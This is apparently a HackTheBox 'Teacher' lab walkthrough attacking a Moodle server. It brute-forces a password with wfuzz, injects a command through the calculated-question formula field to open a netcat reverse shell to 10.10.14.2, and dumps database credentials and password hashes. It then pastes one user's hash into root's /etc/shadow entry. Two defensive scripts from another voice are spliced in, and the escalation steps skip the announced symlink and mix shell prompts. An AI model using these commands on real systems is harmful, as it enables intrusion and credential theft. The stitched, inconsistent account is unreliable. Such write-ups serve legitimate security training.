TEACHER (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.153
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-20 22:42 EDT
Nmap scan report for 10.10.10.153
Host is up (0.14s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops

TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 135.91 ms 10.10.14.1
2 136.00 ms 10.10.10.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.22 seconds

root@kali:~/Downloads# gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.153/

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.153/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/04/20 22:49:04 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/js (Status: 301)
/manual (Status: 301)
/moodle (Status: 301)
/phpmyadmin (Status: 403)
/server-status (Status: 403)
=====================================================
2019/04/20 22:50:09 Finished
=====================================================

root@kali:~/Downloads/10.10.10.153# wget http://10.10.10.153/images/5.png
--2019-04-20 22:50:48--  http://10.10.10.153/images/5.png
Connecting to 10.10.10.153:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 200 [image/png]
Saving to: '5.png'

5.png               100%[===================================================>]     200  --.-KB/s    in 0s

2019-04-20 22:50:48 (42.6 MB/s) - '5.png' saved [200/200]

root@kali:~/Downloads/10.10.10.153# cat 5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

Now open the Moodle login page,

http://10.10.10.153/moodle/login/index.php

submit any credentials, and intercept the request:

POST /moodle/login/index.php HTTP/1.1
Host: 10.10.10.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.153/moodle/login/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Cookie: MoodleSession=ck6j7ier0luqubelgq4s4bfvq1
Connection: close
Upgrade-Insecure-Requests: 1

anchor=&username=user&password=pws

The response is a redirect straight back to the login page, i.e. a failed login:

HTTP/1.1 303 See Other
Date: Sun, 21 Apr 2019 02:50:36 GMT
Server: Apache/2.4.25 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://10.10.10.153/moodle/login/index.php
Content-Language: en
Content-Length: 440
Connection: close
Content-Type: text/html; charset=utf-8

root@kali:~/Downloads/10.10.10.153# wfuzz -w /usr/share/wordlists/SecLists/Fuzzing/alphanum-case-extra.txt -L -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" --hw 1224 http://10.10.10.153/moodle/login/index.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://10.10.10.153/moodle/login/index.php
Total requests: 95

==================================================================
ID      Response   Lines    Word     Chars       Payload
==================================================================

000003:  C=200    296 L     1257 W    27569 Ch    "#"

Responses with the failed-login word count (1224) are hidden by --hw, so the single payload that gets through, #, completes the password and gives us the credentials:

Username: Giovanni
Password: Th4C00lTheacha#

We are in. The next step is the Moodle remote code execution described at

https://blog.ripstech.com/2018/moodle-remote-code-execution/

Go to Dashboard -> Algebra -> the "hacked quizz" quiz -> Edit quiz -> click the Add button on the right and select "a new question".

Select Calculated as the question type and click Add, then fill in all the fields and put the following in the formula field:

formula : 1?>

Click Save and then Next.

Start a listener on Kali:

root@kali:~/Downloads/10.10.10.153# nc -lvnp 4444
listening on [any] 4444 ...

Refresh the page in the browser and capture the request in Burp. First append &0=(ping -c 1 10.10.14.2) to the query string to confirm that the command is executed,

and watch for the ICMP echo requests on the terminal:

root@kali:~/htb/teacher# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:23:53.098921 IP 10.10.10.153 > kali: ICMP echo request, id 903, seq 1, length 64
09:23:53.098931 IP kali > 10.10.10.153: ICMP echo reply, id 903, seq 1, length 64
09:23:53.176647 IP 10.10.10.153 > kali: ICMP echo request, id 905, seq 1, length 64
09:23:53.176657 IP kali > 10.10.10.153: ICMP echo reply, id 905, seq 1, length 64

Now replace it with

&0=(nc 10.10.14.2 4444 -e /bin/bash)

URL-encode only the value, then click Go to get the shell:

GET /moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcmid%3D7&appendqnumstring&scrollpos=0&id=14&wizardnow=datasetitems&cmid=7&0=(nc+10.10.14.2+4444+-e+/bin/bash) HTTP/1.1
Host: 10.10.10.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: MoodleSession=4tlauc5mujabto3220adb7gu14; MOODLEID1_=%259C8vu%25EA%258F%25FB%25A4
Connection: close
Upgrade-Insecure-Requests: 1

After clicking Go the listener receives the shell:

root@kali:~/Downloads/10.10.10.153# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.153] 57962

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$

Press Ctrl+Z to background the shell, then on Kali run

root@kali:~# stty raw -echo

and type fg followed by Enter to get the upgraded TTY shell back.

www-data@teacher:/var/www/html/moodle/question$ cd ..
www-data@teacher:/var/www/html/moodle$ cat config.php
$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8mb4_unicode_ci',
);

$CFG->wwwroot   = 'http://10.10.10.153/moodle';
$CFG->dataroot  = '/var/www/moodledata';
$CFG->admin     = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

This gives us the database credentials. Connect to MariaDB with them:

www-data@teacher:/var/www/html/moodle$ mysql -u root -pWelkom1! -D moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 408
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [moodle]>

MariaDB [moodle]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| moodle             |
| mysql              |
| performance_schema |
| phpmyadmin         |
+--------------------+
5 rows in set (0.00 sec)

MariaDB [moodle]> SHOW TABLES;
388 rows in set (0.01 sec)

MariaDB [moodle]> SELECT username,password FROM mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)

Giovannibak looks like an old backup of giovanni's password, and from its length it looks like an MD5 hash, which can be easily decrypted. On decrypting it I got

password : expelled

You can decrypt it on the web from any such website.

Now switch to giovanni with that password:

www-data@teacher:/var/www/html/moodle/question$ su giovanni
Password: expelled

giovanni@teacher:/var/www/html/moodle/question$ id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)

giovanni@teacher:/var/www/html/moodle/question$ cd /home
giovanni@teacher:/home$ ls -lrt
total 4
drwxr-x--- 4 giovanni giovanni 4096 Nov  4 19:47 giovanni

giovanni@teacher:/home$ cd giovanni
giovanni@teacher:~$ cat user.txt
fa9ae1874625XXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation
After enumeration I found an interesting process running as root: /bin/bash /usr/bin/backup.sh

Content of backup.sh file

#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

The process backs up the contents of the courses directory every 30 seconds and saves it inside tmp, so I tried something that I found in a previous machine, "JOKER".
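As an added example (not the box's script and not the author's), here is a hardened rewrite of backup.sh that closes the footholds a root-run job in a user-owned directory offers: it refuses a symlink wherever it expects a directory, archives by fixed name instead of expanding a wildcard, and replaces chmod 777 -R with least-privilege modes. It assumes the same layout as the original, WORKDIR/courses and WORKDIR/tmp, passed as its single argument.

```shell
#!/bin/sh
# Hardened rewrite of the backup job above (added example; not the box's script).
# Root cause on the box: a root job works inside a directory its unprivileged owner
# controls and then runs 'chmod 777 * -R'. The real fix is to write backups to a
# root-owned location; if the job must stay here, these checks remove the symlink
# and wildcard footholds that make the original dangerous.
set -eu

# Refuse anything that is missing, a symlink, or not a directory. The owner of the
# work directory can swap any of these paths for a link to a place root can write.
require_real_dir() {
    [ -e "$1" ]   || { echo "missing: $1" >&2; return 1; }
    [ ! -L "$1" ] || { echo "refusing symlink: $1" >&2; return 1; }
    [ -d "$1" ]   || { echo "not a directory: $1" >&2; return 1; }
}

# hardened_backup WORKDIR: archives WORKDIR/courses into WORKDIR/tmp and extracts
# it there, as the original did, without following planted links.
hardened_backup() {
    work="$1"
    require_real_dir "$work"         || return 1
    require_real_dir "$work/courses" || return 1
    require_real_dir "$work/tmp"     || return 1
    # The extraction target itself must not already be a link either.
    if [ -L "$work/tmp/courses" ]; then
        echo "refusing symlink: $work/tmp/courses" >&2; return 1
    fi

    # Archive the directory by name, not 'courses/*': a fixed operand cannot be
    # swapped for a file name the directory's owner chooses, and every path is
    # anchored to WORKDIR instead of relative to a cd into user-controlled space.
    tar -czf "$work/tmp/backup_courses.tar.gz" -C "$work" courses
    tar -xzf "$work/tmp/backup_courses.tar.gz" -C "$work/tmp"

    # Least privilege instead of 777. find's -type d / -type f never match
    # symlinks, so a link planted under tmp/ cannot redirect the chmod.
    find "$work/tmp" -type d -exec chmod 0750 {} +
    find "$work/tmp" -type f -exec chmod 0640 {} +
}

# Run only when a work directory is given, so the file can also be sourced.
if [ "$#" -eq 1 ]; then
    hardened_backup "$1"
fi
```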

We know that it is backing up the data, so I just made a soft link to /root, but before that make a backup of the directory, i.e.:

giovanni@teacher:~$ cd work
cd work

www-data@teacher:/home/giovanni/work$ cat /etc/shadow
root:$6$bumbaclart$GPxFSv6bet2v27jgIKP9ur4LQqI7U2PmNzwX7BGXdXDS2tOYJF8Nn/Gm41G5CbHJ3nIF5uHa2aYhcvVNEO3Ts1:17709:0:99999:7:::
daemon:*:17708:0:99999:7:::
bin:*:17708:0:99999:7:::
sys:*:17708:0:99999:7:::
sync:*:17708:0:99999:7:::
games:*:17708:0:99999:7:::
man:*:17708:0:99999:7:::
lp:*:17708:0:99999:7:::
mail:*:17708:0:99999:7:::
news:*:17708:0:99999:7:::
uucp:*:17708:0:99999:7:::
proxy:*:17708:0:99999:7:::
www-data:*:17708:0:99999:7:::
backup:*:17708:0:99999:7:::
list:*:17708:0:99999:7:::
irc:*:17708:0:99999:7:::
gnats:*:17708:0:99999:7:::
nobody:*:17708:0:99999:7:::
systemd-timesync:*:17708:0:99999:7:::
systemd-network:*:17708:0:99999:7:::
systemd-resolve:*:17708:0:99999:7:::
systemd-bus-proxy:*:17708:0:99999:7:::
_apt:*:17708:0:99999:7:::
messagebus:*:17708:0:99999:7:::
sshd:*:17708:0:99999:7:::
mysql:!:17708:0:99999:7:::
giovanni:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::

giovanni@teacher:~/work$ cat /etc/shadow | grep giovanni
giovanni:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::

Edit the shadow file and paste giovanni's hash from above,

$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0

into root's entry, so that it becomes:

root:$6$RiDoH4VN$WamVNCkuoZyN1uM6hmyKKt6GwGWAamiQM3SYCrr5lmUYnmV7vpBNkYZCHqjh7UDtsdF8NbGjM7dJPIsxeFkrx0:17709:0:99999:7:::
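This kind of edit leaves a cheap indicator for a defender: two accounts carrying the byte-identical $6$salt$hash string, which never happens for independently set passwords because the salt is random. As an added example (not from the writeup), this shell/awk check flags duplicated hashes and empty password fields in a shadow-format file; the sample file it writes is constructed, with placeholder strings in place of real hashes.

```shell
#!/bin/sh
# Added example: audit a shadow-format file for the tampering shown above, where
# one account's salted hash is pasted into another account's entry. Because the
# salt travels with the hash, the two password fields become identical. An empty
# password field is the other state a writable shadow file tends to end up in.
set -eu

# audit_shadow FILE: prints one finding per line, nothing if the file looks clean.
# Findings: "DUPLICATE_HASH <first-user> <second-user>" and "EMPTY_PASSWORD <user>".
audit_shadow() {
    awk -F: '
        $2 == ""        { print "EMPTY_PASSWORD " $1; next }
        $2 ~ /^[*!]/    { next }                      # locked account, no hash
        ($2 in owner)   { print "DUPLICATE_HASH " owner[$2] " " $1; next }
                        { owner[$2] = $1 }
    ' "$1"
}

# make_sample FILE: writes a constructed shadow file for testing. The hash strings
# are placeholders, not real hashes; root and giovanni deliberately share one.
make_sample() {
    cat > "$1" <<'EOF'
root:$6$saltAAAA$PLACEHOLDERHASHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:17709:0:99999:7:::
daemon:*:17708:0:99999:7:::
mysql:!:17708:0:99999:7:::
www-data:*:17708:0:99999:7:::
svc:$6$saltBBBB$PLACEHOLDERHASHbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:17709:0:99999:7:::
giovanni:$6$saltAAAA$PLACEHOLDERHASHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:17709:0:99999:7:::
tester::17709:0:99999:7:::
EOF
}

# Audit the file given on the command line; without one, only define the functions.
if [ "$#" -eq 1 ]; then
    audit_shadow "$1"
fi
```

On a real host this would run against /etc/shadow from a root cron job or a file-integrity check, alongside a baseline comparison of the file itself.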

giovanni@teacher:~/work$ su root
Password: expelled

root@teacher:/home/giovanni/work$ cd /root

root@teacher:/root$ cat root.txt
4f3a83b42acXXXXXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT
